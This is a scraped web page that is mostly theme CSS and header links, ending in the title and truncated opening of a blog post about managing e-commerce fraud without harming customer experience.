spin{100%{transform:rotate(360deg)}}.twp-d-flex{display:flex;flex-wrap:wrap}.twp-row{display:flex;flex-wrap:wrap;margin-left:-7.5px;margin-right:-7.5px}.twp-col,.twp-col-gap{padding-left:7.5px;padding-right:7.5px}.twp-col{flex:0 0 100%;max-width:100%}@media (min-width: 576px){.twp-col-xs-6{flex:0 0 50%;max-width:50%}}@media (min-width: 768px){.twp-col-sm-4{flex:0 0 33.33%;max-width:33.33%}}@media (min-width: 992px){.twp-col-md-6{flex:0 0 50%;max-width:50%}}@media (min-width: 1050px){.twp-col-lg-4{flex:0 0 33.33%;max-width:33.33%}}.site-content{margin-left:auto;margin-right:auto;padding-bottom:30px;padding-left:15px;padding-right:15px}@media (min-width: 576px){.site-content{width:540px}}@media (min-width: 768px){.site-content{width:720px}}@media (min-width: 992px){.site-content{width:960px}}@media (min-width: 1050px){.site-content{width:1140px}}#primary{width:100%}@media (min-width: 992px){#primary{width:70%}}#secondary{width:100%}@media (min-width: 992px){#secondary{width:30%}}#secondary section{margin-top:30px}#secondary .container{padding:0}.right-sidebar #primary{float:left;padding-right:7.5px;padding-left:7.5px}@media (min-width: 992px){.right-sidebar #primary{padding-left:0;padding-right:15px}}.right-sidebar #secondary{float:left;padding-left:7.5px;padding-right:7.5px}@media (min-width: 992px){.right-sidebar #secondary{padding-right:0;padding-left:15px}}.clearfix:before,.clearfix:after{clear:both;content:"";display:block}amp-img{vertical-align:middle}.data-bg{background-size:cover;background-repeat:no-repeat;background-position:center;display:block;background-color:#7b7b7b}.data-bg-sm{height:70px}.float-left{float:left}.float-right{float:right}html{font-size:14px;font-family:"Source Sans Pro";font-weight:400}html body{color:black;font-family:"Source Sans Pro"}h1,h2,h3,h4,input,.twp-secondary-font{font-family:"Merriweather"}.twp-author-desc{display:flex;align-items:center;font-weight:600;flex-wrap:wrap}.twp-author-desc span{display:inline-block;margin-right:15px;padding-top:5px}.twp-author-desc span:last-child{margin-right:0}.twp-author-desc span span{margin-right:5px;padding-top:0}.twp-author-desc span span:last-child{margin-right:0}.twp-author-desc .twp-single-post-author .twp-author-image{width:35px;vertical-align:middle}.twp-author-desc .twp-single-post-author .twp-author-image amp-img{border-radius:100%}.twp-categories ul{display:flex;flex-wrap:wrap}.twp-categories ul li{line-height:1;display:inline-block}.twp-categories ul li a{display:inline-block;padding-left:5px;padding-right:5px;padding-top:10px;font-weight:600;line-height:1}.twp-categories.twp-primary-categories a{color:#c20017}.twp-categories.twp-primary-categories a:hover,.twp-categories.twp-primary-categories a:focus{color:#f88c00}.twp-close-icon{width:50px;position:relative;display:inline-block;cursor:pointer;height:100%;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.twp-close-icon.twp-close-icon-sm{width:20px}.twp-close-icon.twp-close-icon-sm span{width:20px}.twp-close-icon span{display:block;position:absolute;width:25px;height:3px;z-index:5;top:50%;border-radius:5px;transform:rotate(45deg)}.twp-close-icon span:last-child{transform:rotate(135deg)}.twp-menu-icon{position:relative;height:20px;width:24px;border-radius:5px;cursor:pointer;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.twp-menu-icon:before{position:absolute;display:block;content:"";background-color:black;height:2px;width:100%;border-radius:5px;left:0;top:50%;transform:translateY(-50%)}.twp-menu-icon span:before,.twp-menu-icon span:after{position:absolute;display:block;content:"";background-color:black;height:2px;width:100%;border-radius:5px;left:0}.twp-menu-icon span:before{top:1px}.twp-menu-icon span:after{bottom:1px}.twp-plus-icon{width:50px;position:relative;display:inline-block;cursor:pointer;height:50px}.twp-plus-icon.twp-close-icon-sm{width:20px}.twp-plus-icon.twp-close-icon-sm span{width:20px}.twp-plus-icon span{display:block;position:absolute;width:25px;height:3px;z-index:1;top:50%;border-radius:5px;transform:rotate(0deg)}.twp-plus-icon span:last-child{transform:rotate(90deg)}.twp-image-70{height:70px}.twp-image-150{height:150px}.twp-post .twp-image-section{position:relative}.twp-post .twp-image-section > a{position:absolute;width:100%;height:100%;left:0;top:0;z-index:1}.twp-post .twp-image-section .twp-image{position:absolute;width:100%;height:100%;left:0;top:0}.twp-image-hover-effect{overflow:hidden}.twp-image-hover-effect .twp-image{transition:transform .3s linear;-webkit-transition:transform .3s linear;-moz-transition:transform .3s linear;backface-visibility:hidden;-webkit-backface-visibility:hidden;-moz-backface-visibility:hidden}.twp-image-hover-effect:hover .twp-image{transform:scale(1.1,1.1);-webkit-transform:scale(1.1,1.1);-moz-transform:scale(1.1,1.1)}.twp-search-field-wrapper{display:flex;flex-wrap:wrap}.twp-search-field-wrapper .twp-search-field{flex:0 0 calc(100% - 50px);max-width:calc(100% - 50px)}.twp-search-field-wrapper .twp-search-field form{display:flex;flex-wrap:wrap}.twp-search-field-wrapper .twp-search-field form label{flex:0 0 70%;max-width:70%}.twp-search-field-wrapper .twp-search-field form label input{width:100%;border:0;border-radius:0;padding:15px 30px;background-color:white}.twp-search-field-wrapper .twp-search-field form input[type=submit]{width:30%;border:0;cursor:pointer;font-size:1rem;padding:0 15px;font-weight:600;border-radius:0}@media (min-width: 768px){.twp-search-field-wrapper .twp-search-field form input[type=submit]{font-size:20px}}.twp-search-field-wrapper .twp-close-icon-section{flex:0 0 50px;max-width:50px;padding-left:10px}.twp-post p,.twp-post .twp-post-title{margin:0;padding-top:10px}.twp-post .twp-post-title a{overflow:hidden;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical;box-orient:vertical;line-clamp:2;-webkit-line-clamp:2}.twp-post .twp-post-title.twp-line-limit-3 a{overflow:hidden;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical;box-orient:vertical;line-clamp:3;-webkit-line-clamp:3}.twp-post .twp-categories ul{margin:0;border:0}.twp-post .twp-categories li{padding:0;border:0}.twp-post-style-1{display:flex;flex-wrap:wrap}.twp-post-style-1 .twp-image-section{flex:0 0 100px;max-width:100px}.twp-post-style-1 .twp-desc{flex:0 0 calc(100% - 100px);max-width:calc(100% - 100px);padding-left:10px}.twp-post-style-1 .twp-post-title{padding-top:0}.twp-post-style-1 .twp-categories a{padding-top:5px}.twp-single-related-post .twp-desc{border-left-style:solid;border-left-width:1px;border-right-style:solid;border-right-width:1px;border-bottom-style:solid;border-bottom-width:1px;border-bottom-left-radius:5px;border-bottom-right-radius:5px;padding:10px;border-color:#f3f3f3}.twp-single-related-post .twp-post-title{padding-top:5px}.twp-ticket-pin{padding:0 7.5px;height:50px;overflow:hidden}.twp-ticket-pin .twp-image-section{float:left;width:80px;background-color:gray}.twp-ticket-pin .twp-image-section .data-bg{height:50px}.twp-ticket-pin .twp-title-section{padding-left:10px;float:left;width:calc(100% - 80px)}.twp-ticket-pin .twp-title-section .twp-post-title{margin:0;padding-top:10px}.twp-ticket-pin .twp-title-section a{overflow:hidden;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical;box-orient:vertical;line-clamp:2;-webkit-line-clamp:2}.twp-single-author-info .twp-author-avatar,.twp-single-author-info .twp-author-description{margin-top:30px}.twp-single-author-info .twp-author-avatar{flex:0 0 100px;max-width:100px}.twp-single-author-info .twp-author-avatar amp-img{box-shadow:0 0 5px 5px rgba(238,238,238,.6);padding:15px;border-radius:5px}.twp-single-author-info .twp-author-description{flex:0 0 calc(100% - 100px);max-width:calc(100% - 100px)}.twp-single-author-info .twp-author-description .twp-author-name{font-size:1.2rem;font-weight:800}.twp-single-author-info .twp-author-description .twp-title{margin-top:0}.twp-single-author-info .twp-author-description .twp-author-email{padding:10px 0;font-style:italic}.twp-tag-caption{padding:0 15px;line-height:30px;height:30px;position:relative;margin-right:10px}.twp-tag-caption:after{content:"";display:block;position:absolute;top:50%;right:-26px;transform:translateY(-50%);border-color:transparent transparent transparent #c20017;border-style:solid;border-width:13px}.twp-tags-items{display:flex;flex-wrap:wrap}.twp-tags-items li a{display:inline-block;text-decoration:none;padding:0 15px;font-weight:600;font-size:12px;line-height:30px;color:black}.twp-tags-items li a:hover,.twp-tags-items li a:focus{color:#c20017}.widget-title a,.entry-title a,.twp-post-title a,.twp-section-title a{word-break:break-word}.widget-title,.twp-section-title{font-size:22px}.twp-post-title,.twp-section-title-sm{font-size:16px}.twp-post-title-sm{font-size:.8rem}.twp-title{margin-top:0;margin-bottom:0;position:relative;padding-bottom:10px;line-height:1}.twp-title:after{content:"";display:block;position:absolute;left:0;bottom:0;width:40px;height:3px}.twp-title i{padding-left:15px}.twp-title.twp-sm-title{font-size:1.2rem}.twp-secondary-title{margin:0;border-bottom-style:solid;border-bottom-width:2px;border-color:#f3f3f3;padding-bottom:10px;position:relative}.desktop .twp-main-menu > ul{display:flex;flex-wrap:wrap}.desktop .twp-main-menu > ul > li{font-weight:600}.desktop .twp-main-menu > ul > li:hover > a,.desktop .twp-main-menu > ul > li:focus > a{background-color:rgba(123,123,123,.1)}.desktop .twp-main-menu > ul > li > a{border-bottom-style:solid;border-bottom-width:2px;border-color:transparent;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.desktop .twp-main-menu .sub-menu{background-color:#f3f3f3;box-shadow:none;transition:all .3s ease;-webkit-transition:all .3s ease;-moz-transition:all .3s ease}.desktop .twp-main-menu .sub-menu a{border-top-style:solid;border-top-width:1px;border-color:#d5d5d5;display:block;overflow:hidden}.desktop .twp-main-menu .sub-menu a:before{display:block;position:absolute;content:"";width:3px;height:100%;bottom:-100%;left:0;background-color:#c20017;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.desktop .twp-main-menu .sub-menu a:hover:before{bottom:0}.desktop .twp-main-menu > ul > li .sub-menu{position:absolute;top:110%;left:0;width:220px;opacity:0;height:0;overflow:hidden;visibility:hidden;transition:all 1s ease;-webkit-transition:all 1s ease;-moz-transition:all 1s ease;z-index:3}.desktop .twp-main-menu > ul > li:hover > .sub-menu,.desktop .twp-main-menu > ul > li:focus-within .sub-menu{top:100%;opacity:1;height:auto;overflow:visible;visibility:visible}.desktop .twp-main-menu > ul > li .sub-menu > li .sub-menu{top:20%;left:100%;overflow:hidden;visibility:hidden}.desktop .twp-main-menu > ul > li .sub-menu > li:hover .sub-menu,.desktop .twp-main-menu > ul > li .sub-menu > li:focus-within .sub-menu{opacity:1;height:auto;top:0;overflow:visible;visibility:visible}.desktop .twp-main-menu > ul > li .sub-menu > li .sub-menu > li .sub-menu{top:20%;left:100%;overflow:hidden;visibility:hidden}.desktop .twp-main-menu > ul > li .sub-menu > li .sub-menu > li:hover .sub-menu,.desktop .twp-main-menu > ul > li .sub-menu > li .sub-menu > li:focus-within .sub-menu{opacity:1;height:auto;top:0;overflow:visible;visibility:visible}.desktop .twp-main-menu li{position:relative}.desktop .twp-main-menu a{position:relative;color:black;display:inline-block;text-decoration:none;padding:0 12px;height:40px;line-height:40px}.desktop .twp-main-menu a:hover,.desktop .twp-main-menu a:focus{color:#f88c00}.twp-single-page-post-section{margin:0}.twp-single-page-post-section p{text-align:justify}.twp-single-page-post-section .entry-content .entry-title,.twp-single-page-post-section .entry-content p,.twp-single-page-post-section .entry-content h2,.twp-single-page-post-section .entry-content h3,.twp-single-page-post-section .entry-header .entry-title,.twp-single-page-post-section .entry-header p,.twp-single-page-post-section .entry-header h2,.twp-single-page-post-section .entry-header h3{margin-bottom:0;margin-top:20px}.twp-single-page-post-section .entry-header{padding-top:15px}.twp-single-page-post-section .entry-header p{font-style:italic;font-size:1.1rem}.twp-single-page-post-section .entry-header .twp-author-desc{padding-top:15px}.twp-single-page-post-section .entry-content{margin:0}.twp-single-page-post-section .entry-footer{padding:15px 0 20px 0;border-bottom-style:solid;border-bottom-width:2px;font-weight:600;border-color:#f3f3f3}.twp-single-page-post-section .entry-footer span,.twp-single-page-post-section .entry-footer a{display:inline-block}.twp-single-page-post-section .entry-footer .twp-icon,.twp-single-page-post-section .entry-footer i{padding-right:5px}.twp-single-page-post-section .entry-footer .twp-links{padding-right:15px}.twp-single-page-post-section .entry-footer a{padding-left:5px}.twp-single-page-post-section ul{margin:0}.twp-single-page-post-section ul li{padding-top:15px}.twp-single-page-post-section .wp-block-categories{padding-top:15px}.twp-single-page-post-section table td{padding:10px 15px;text-align:center}.widget{padding:0 15px 15px;box-shadow:0 0 11px 5px rgba(238,238,238,.7);margin-bottom:15px}.widget:last-child{margin-bottom:0}.widget .widget-title{margin-top:0;margin-bottom:15px;position:relative;padding:15px 0;line-height:1}.widget .widget-title:after{content:"";display:block;position:absolute;left:0;bottom:0;width:25px;height:3px}.widget ul{font-weight:600}.widget ul li{padding:15px 0;border-bottom-style:solid;border-bottom-width:1px;border-color:#f3f3f3}.widget ul li:last-child{border-bottom:0;padding-bottom:0}.widget ul li:first-child{padding-top:0}.widget ul li ul{margin-top:15px;border-top-style:solid;border-top-width:1px;border-color:#f3f3f3}.widget ul li ul li{padding:10px 30px 10px 15px}.widget ul li ul li:first-child{padding-top:10px}.widget .search-form{padding-top:15px}.widget .search-form label{width:calc(100% - 90px);float:left;padding-right:5px}.widget .search-form label input{width:100%;height:45px;border-radius:0;padding:0 15px;border-color:#f3f3f3}.widget .search-form .search-submit{width:90px;height:45px;float:left;font-size:1rem;border-radius:0;border:0;cursor:pointer;font-weight:600;padding:0}.twp-single-next-post{padding:30px 0 45px;border-bottom-style:solid;border-bottom-width:2px;border-color:#f3f3f3;position:relative;z-index:1}.twp-single-next-post:before{position:absolute;content:"";display:block;left:0;right:0;bottom:0;z-index:1;height:150px;background:-webkit-linear-gradient(top,rgba(255,255,255,0) 0%,white 86%,white 87%,white 100%);background:linear-gradient(top,rgba(255,255,255,0) 0%,white 86%,white 87%,white 100%)}.twp-single-next-post .twp-title,.twp-single-next-post .twp-categories,.twp-single-next-post .twp-secondary-title,.twp-single-next-post .twp-caption,.twp-single-next-post .twp-image-section,.twp-single-next-post .twp-time{margin-top:15px}.twp-single-next-post .twp-caption{font-style:italic}.twp-single-next-post .twp-image-section{position:relative;height:200px;overflow:hidden;text-align:center}.twp-single-next-post .twp-time i{padding-right:5px;font-size:20px;vertical-align:middle}.twp-articles-list{background-color:#dfe0e4}.twp-articles-list .twp-post{border-bottom-style:solid;border-bottom-width:1px;border-color:#f3f3f3;padding:10px}.twp-articles-list .twp-post:hover{background-color:rgba(128,128,128,.3);border-color:rgba(128,128,128,.3)}.twp-articles-list .twp-article-header{padding:10px 15px;position:relative}.twp-articles-list .twp-article-header .twp-section-title{margin:0;color:black}.twp-articles-list .twp-article-header .twp-close-icon-section{height:30px;position:absolute;right:0;top:50%;transform:translateY(-50%)}.twp-breadcrumbs{background-color:#d5d5d5;font-weight:600}.twp-breadcrumbs ul li{float:left;padding:10px 30px 10px 0;position:relative;color:black}.twp-breadcrumbs ul li a{color:black}.twp-breadcrumbs ul li a:hover,.twp-breadcrumbs ul li a:focus{color:#f88c00}.twp-breadcrumbs ul li:after{content:"";display:block;font-family:fontAwesome;position:absolute;right:10px;top:50%;transform:translateY(-50%)}.twp-breadcrumbs ul li:last-child:after{display:none}.twp-footer{background-color:rgba(0,0,0,.4);color:white;padding:15px 0}.twp-footer a{color:white;text-decoration:none}.twp-site-branding.data-bg{background-color:transparent}.twp-site-branding .twp-wrapper{padding:15px 0}@media (min-width: 768px){.twp-site-branding .twp-wrapper{padding-bottom:30px;padding-top:30px}}@media (min-width: 1050px){.twp-site-branding .twp-wrapper{display:flex;flex-wrap:wrap;justify-content:space-between;align-items:center}}.twp-site-branding .twp-wrapper .twp-logo{text-align:center;line-height:1.4;padding:0 7.5px}.twp-site-branding .twp-wrapper .twp-logo h1{margin-top:0;margin-bottom:0}@media (min-width: 1050px){.twp-site-branding .twp-wrapper .twp-logo{flex:0 0 calc(100% - 728px);max-width:calc(100% - 728px);text-align:inherit}}.twp-site-branding .twp-wrapper .twp-logo .twp-image-wrapper{display:block;width:260px;max-width:100%}@media (max-width: 1049px){.twp-site-branding .twp-wrapper .twp-logo .twp-image-wrapper{margin-left:auto;margin-right:auto}}.twp-site-branding .twp-wrapper .twp-logo .site-title{margin-top:5px;margin-bottom:0;line-height:1;text-transform:capitalize}.twp-site-branding .twp-wrapper .twp-logo .site-title a{font-size:35px;font-weight:800;font-family:"EB+Garamond"}.twp-site-branding .twp-wrapper .twp-logo .site-description{margin:0}.twp-site-branding .twp-wrapper .twp-ad{padding:15px 7.5px 0 7.5px;text-align:center}@media (min-width: 1050px){.twp-site-branding .twp-wrapper .twp-ad{flex:728px;max-width:728px;padding-top:0;text-align:inherit}}.twp-site-branding .twp-wrapper .twp-ad a{display:inline-block;width:100%}.twp-site-branding .twp-wrapper .twp-ad a .data-bg{background-color:transparent;background-size:contain;transition:transform 1s ease;-webkit-transition:transform 1s ease;-moz-transition:transform 1s ease}.twp-site-branding .twp-wrapper .twp-ad a:hover .data-bg{transform:scale(.9);-webkit-transform:scale(.9);-moz-transform:scale(.9)}.twp-site-branding .twp-wrapper .twp-ad .twp-ad-image{height:45px;overflow:hidden}@media (min-width: 576px){.twp-site-branding .twp-wrapper .twp-ad .twp-ad-image{height:90px}}.twp-mobile-menu{position:fixed;width:100%;height:100%;z-index:10;top:0;bottom:0;left:-100%;background-color:white;padding:30px;color:white;overflow-y:auto;transition:all .5s ease}@media (min-width: 768px){.twp-mobile-menu{width:300px}}.twp-mobile-menu .twp-mobile-close-icon{text-align:right}.twp-mobile-menu ul li a{display:block;font-weight:600;font-size:1.2rem;line-height:1;padding:10px 0;position:relative}.twp-navigation .theme-mode a,.twp-navigation .twp-search-section{display:block;padding:0 15px;height:40px;line-height:40px;background-color:gray;color:white;cursor:pointer;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.twp-navigation{position:relative}.twp-navigation .twp-nav-left-content{display:flex}.twp-navigation .twp-nav-left-content .twp-nav-sidebar-menu{display:flex;padding-top:10px}@media (min-width: 1050px){.twp-navigation .twp-nav-left-content .twp-nav-sidebar-menu .twp-mobile-menu-icon{display:none}}.twp-navigation .twp-nav-left-content .twp-nav-sidebar-menu .twp-mobile-menu-icon .twp-menu-icon:before{width:80%}.twp-navigation .twp-nav-left-content .twp-menu-section{display:none}@media (min-width: 1050px){.twp-navigation .twp-nav-left-content .twp-menu-section{display:block}}.twp-navigation .twp-nav-right-content .twp-latest-news-button-section .twp-nav-button{height:40px;line-height:40px;padding:0 15px;cursor:pointer;font-weight:600;position:relative}.twp-navigation .twp-articles-list{position:absolute;top:100%;left:0;height:0;width:100%;overflow:hidden;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear;z-index:2}.twp-navigation .twp-search-field-section{background:#d5d5d5;padding:30px 0;display:none}@media (min-width: 576px){.twp-navigation .twp-search-field-section{padding:30px}}#sticky-nav-menu{margin-top:-1px}.twp-offcanvas-sidebar-wrapper{padding-top:15px;background-color:white;color:black}.twp-offcanvas-sidebar-wrapper .twp-offcanvas-close-icon{margin-bottom:15px;text-align:right}.twp-offcanvas-sidebar-wrapper a{color:black}.twp-offcanvas-sidebar-wrapper a:hover,.twp-offcanvas-sidebar-wrapper a:focus{color:#f88c00}.twp-offcanvas-sidebar-wrapper .container{padding:0}.twp-ticker-pin-slider-section .twp-ticker-pin-slider:not(.slick-initialized){opacity:0;visibility:hidden;max-height:50px;transition:opacity 1s ease;-webkit-transition:opacity 1s ease}.twp-ticker-pin-slider-section .twp-ticker-pin-slider{visibility:visible;opacity:1;transition:opacity 1s ease;-webkit-transition:opacity 1s ease}.twp-ticker-pin-slider-section{background-color:#f3f3f3;overflow:hidden;position:fixed;left:0;right:0;bottom:-200px;z-index:9;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.twp-ticker-pin-slider-section .twp-ticker-close{position:absolute;left:-100%;top:50%;transform:translateY(-50%);z-index:1;cursor:pointer}@media (min-width: 1050px){.twp-ticker-pin-slider-section .twp-ticker-close{left:0}}.twp-ticker-pin-slider-section .twp-wrapper{position:relative}.twp-ticker-pin-slider-section .twp-section-title{float:left;padding:0 10px;position:relative;height:50px;line-height:50px;z-index:1;margin:0 0px 0 60px;display:none}@media (min-width: 1050px){.twp-ticker-pin-slider-section .twp-section-title{display:block}}.twp-ticker-pin-slider-section .twp-section-title:before,.twp-ticker-pin-slider-section .twp-section-title:after{top:0;position:absolute;width:0;height:0;display:block;content:""}.twp-ticker-pin-slider-section .twp-section-title:before{left:-20px;border-left:20px solid transparent;border-bottom:50px solid #c20017}.twp-ticker-pin-slider-section .twp-section-title:after{border-top:50px solid #c20017;border-right:20px solid transparent;right:-20px}.twp-ticker-open{position:fixed;bottom:60px;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.twp-ticker-open.close{left:-200px}.twp-ticker-open .twp-plus-icon{display:none;justify-content:center;border-radius:50%;background-color:white;box-shadow:0 0 5px 5px #eee}@media (min-width: 1050px){.twp-ticker-open .twp-plus-icon{display:flex}}.twp-ticker-open .twp-plus-icon:hover{background-color:#f3f3f3}.twp-top-bar{font-weight:600;background-color:#d5d5d5}.twp-top-bar .twp-header-tags{display:none;height:30px;align-items:center}@media (min-width: 1050px){.twp-top-bar .twp-header-tags{display:flex}}.twp-top-bar .twp-social-icon-section{display:flex;flex-wrap:wrap;width:100%;justify-content:center;align-items:center}@media (min-width: 1050px){.twp-top-bar .twp-social-icon-section{width:initial;justify-content:initial;align-items:initial}}.twp-top-bar .twp-social-icon-section .twp-todays-date{padding:0 15px;line-height:30px;height:30px;display:none}@media (min-width: 1050px){.twp-top-bar .twp-social-icon-section .twp-todays-date{display:block}}.twp-single-page-related-article-section .twp-title{margin-top:30px}.twp-single-related-post-list .twp-post{margin-top:30px}.widget-area .container,.twp-offcanvas-sidebar-wrapper .container{max-width:100%}.widget-area .twp-row,.twp-offcanvas-sidebar-wrapper .twp-row{margin-left:0;margin-right:0}.widget-area .twp-col,.twp-offcanvas-sidebar-wrapper .twp-col{flex:0 0 100%;max-width:100%}.twp-primary-color{color:#c20017}a{color:black;text-decoration:none;cursor:pointer;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}a:hover,a:focus{color:#f88c00}.twp-primary-text{color:#c20017}.twp-primary-text:hover,.twp-primary-text:focus{color:#f88c00}.twp-default-bg{background-color:#f3f3f3}.twp-primary-bg{background-color:#c20017;color:white}#scroll-top{display:none}@media (min-width: 768px){#scroll-top{position:fixed;z-index:1;right:-200px;display:block}}#scroll-top span{display:inline-block;padding:5px 10px;font-size:20px;cursor:pointer}@media (min-width: 1050px){#scroll-top span{padding:10px 15px}}#scroll-top span:hover{background-color:#c20017}.site-title,.site-description{position:absolute;clip:rect(1px,1px,1px,1px);display:none;visibility:hidden;opacity:0}#amp-mobile-version-switcher{left:0;position:absolute;width:100%;z-index:100}#amp-mobile-version-switcher>a{background-color:#444;border:0;color:#eaeaea;display:block;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;font-weight:600;padding:15px 0;text-align:center;-webkit-text-decoration:none;text-decoration:none}#amp-mobile-version-switcher>a:active,#amp-mobile-version-switcher>a:focus,#amp-mobile-version-switcher>a:hover{-webkit-text-decoration:underline;text-decoration:underline}.cookielawinfo-column-1{width:25%}.cookielawinfo-column-3{width:15%}.cookielawinfo-column-4{width:50%}table.cookielawinfo-winter{font:85% "Lucida Grande","Lucida Sans Unicode","Trebuchet MS",sans-serif;padding:0;margin:10px 0 20px;border-collapse:collapse;color:#333;background:#f3f5f7}table.cookielawinfo-winter a{color:#3a4856;text-decoration:none;border-bottom:1px solid #c6c8cb}table.cookielawinfo-winter a:visited{color:#777}table.cookielawinfo-winter a:hover{color:#000}table.cookielawinfo-winter thead th{background:#3a4856;padding:15px 10px;color:#fff;text-align:left;font-weight:normal}table.cookielawinfo-winter tbody{border-left:1px solid #eaecee;border-right:1px solid #eaecee}table.cookielawinfo-winter tbody{border-bottom:1px solid #eaecee}table.cookielawinfo-winter tbody td,table.cookielawinfo-winter tbody th{padding:10px;background:url("https://quantuminsan.com/wp-content/plugins/cookie-law-info/legacy/images/td_back.gif") repeat-x;text-align:left}table.cookielawinfo-winter tbody tr{background:#f3f5f7}table.cookielawinfo-winter tbody tr:hover{background:#eaecee;color:#111}@media (max-width:800px){table.cookielawinfo-row-cat-table td,table.cookielawinfo-row-cat-table th{width:23%;font-size:12px;word-wrap:break-word}table.cookielawinfo-row-cat-table .cookielawinfo-column-4{width:45%}}.cookielawinfo-row-cat-table{width:99%;margin-left:5px}.amp-wp-bf126db:not(#_#_#_#_#_){visibility:hidden;position:absolute;left:-9999px;overflow:hidden}.amp-wp-4c28c30:not(#_#_#_#_#_){background-image:url("https://d32r1sh890xpii.cloudfront.net/article/718x300/2023-03-20_1amnyqgmif.jpg")}.amp-wp-e4c7701:not(#_#_#_#_#_){background-image:url("https://assets-varnish.triblive.com/2023/03/6021413_web1_ptr-FawcettCampaignFinance-032123.jpg")}.amp-wp-b33621f:not(#_#_#_#_#_){background-image:url("https://www.mckinsey.com/~/media/mckinsey/industries/real%20estate/our%20insights/americans%20are%20embracing%20flexible%20work%20and%20they%20want%20more%20of%20it/americans-are-embracing-1308281581-thumb-1536x1536.jpg")}.amp-wp-88ddb6d:not(#_#_#_#_#_){background-image:url("https://www.sltrib.com/resizer/-H2DlzAD75ReN8c7K9Rq9OKhXt4=/1200x630/cloudfront-us-east-1.images.arcpublishing.com/sltrib/2AYPOGSQNBCHRN4GAS7KX75NIQ.jpg")}.amp-wp-4271c83:not(#_#_#_#_#_){background-image:url("https://vtdigger.org/wp-content/uploads/2023/03/1010-SOOS-Office-4808-2-scaled.jpeg")}.amp-wp-6273608:not(#_#_#_#_#_){background-image:url("https://imageio.forbes.com/specials-images/imageserve/6411b5d04d7e1fbcbcff4706/0x0.jpg?format=jpg&crop=4615,2595,x0,y7,safe&width=1200")}.amp-wp-421d924:not(#_#_#_#_#_){background-image:url("https://media.zenfs.com/en/zacks.com/82f836a6a38c3f356a9c7ca2bcbb26f2")}.amp-wp-921a9a3:not(#_#_#_#_#_){background-image:url("https://newjerseymonitor.com/wp-content/uploads/2023/03/52718601683_a8e70330b1_c.jpg")}.amp-wp-3889ea0:not(#_#_#_#_#_){background-image:url("https://bloximages.newyork1.vip.townnews.com/derbyinformer.com/content/tncms/assets/v3/editorial/f/a6/fa64828b-f8bc-5daa-9052-aecc81b6326c/6418c98dde9be.image.jpg?crop=1010,530,0,94&resize=1010,530&order=crop,resize")}.amp-wp-1050db0:not(#_#_#_#_#_){background-image:url("https://www.mcknightsseniorliving.com/wp-content/uploads/sites/3/2022/11/AlerisLife_1440.jpeg")}.amp-wp-2a8fce9:not(#_#_#_#_#_){background-image:url("https://i.insider.com/6411d65fb6d9f20018912c30?width=1200&format=jpeg")}.amp-wp-1cec2f6:not(#_#_#_#_#_){height:1px}.amp-wp-9f6e198:not(#_#_#_#_#_){background-image:url("https://hbr.org/resources/images/article_assets/2022/01/Jan22_26_1286838648.jpg")}.amp-wp-0286575:not(#_#_#_#_#_){background-image:url("https://a57.foxnews.com/static.foxbusiness.com/foxbusiness.com/content/uploads/2022/04/0/0/taxi-terry-cab.jpg?ve=1&tl=1")}.amp-wp-998709c:not(#_#_#_#_#_){background-image:url("https://a57.foxnews.com/static.foxbusiness.com/foxbusiness.com/content/uploads/2021/10/0/0/modernavaccine.jpg?ve=1&tl=1")}.amp-wp-a73a492:not(#_#_#_#_#_){background-image:url("https://cdn.cnn.com/cnnnext/dam/assets/220426145143-yamal-gas-pipeline-poland-0219-super-tease.jpg")}.amp-wp-067ff3c:not(#_#_#_#_#_){background-image:url("https://i.ibb.co/Ss73GV7/Biz-Fin-Ins-Stock-12.jpg")}.amp-wp-b2048a8:not(#_#_#_#_#_){background-image:url("https://g.foolcdn.com/editorial/images/661618/surprised-person-outside-virtual-reality-headset.jpg")}.amp-wp-ceb598f:not(#_#_#_#_#_){margin:0px 5px 0px 0px} /*# sourceURL=amp-custom.css */</style><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="https://quantuminsan.com/xmlrpc.php"><link rel="alternate" type="application/rss+xml" title="Quantuminsan » Feed" href="https://quantuminsan.com/feed"><link rel="https://api.w.org/" href="https://quantuminsan.com/wp-json/"><link rel="alternate" type="application/json" href="https://quantuminsan.com/wp-json/wp/v2/posts/1094"><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://quantuminsan.com/xmlrpc.php?rsd"><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://quantuminsan.com/wp-includes/wlwmanifest.xml"><link rel="shortlink" href="https://quantuminsan.com/?p=1094"><link rel="alternate" type="application/json+oembed" href="https://quantuminsan.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fquantuminsan.com%2F4-ways-to-manage-fraud-without-damaging-the-customer-experience.html"><link rel="alternate" type="text/xml+oembed" href="https://quantuminsan.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fquantuminsan.com%2F4-ways-to-manage-fraud-without-damaging-the-customer-experience.html&format=xml"><link rel="apple-touch-icon" href="https://quantuminsan.com/wp-content/uploads/2022/01/wwwd.png"><title>4 Ways to Manage Fraud Without Damaging the Customer Experience – Quantuminsan

4 Ways to Manage Fraud Without Damaging the Customer Experience

As consumers shift more and more of their shopping habits to digital platforms, the threat and risk of fraud continues to rise. New, unrelenting fraud tactics are emerging everywhere you turn. According to a recent study commissioned by PayPal, “Adaptive ML: The Future Of E-Commerce Fraud Management”, 97{7a5fcad74e69fd0a1026100c5038d51c4a14812d5f844112640eb667c4d02bd8} of global […]

